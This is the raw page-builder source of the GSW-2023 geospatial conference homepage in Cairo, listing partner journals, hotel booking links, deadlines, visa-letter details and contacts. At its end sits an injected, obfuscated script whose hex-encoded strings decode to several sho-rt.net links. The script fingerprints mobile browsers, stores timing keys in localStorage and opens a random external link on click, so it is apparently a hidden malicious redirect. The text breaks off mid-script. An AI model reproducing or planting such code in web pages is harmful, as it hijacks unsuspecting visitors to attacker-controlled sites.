custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 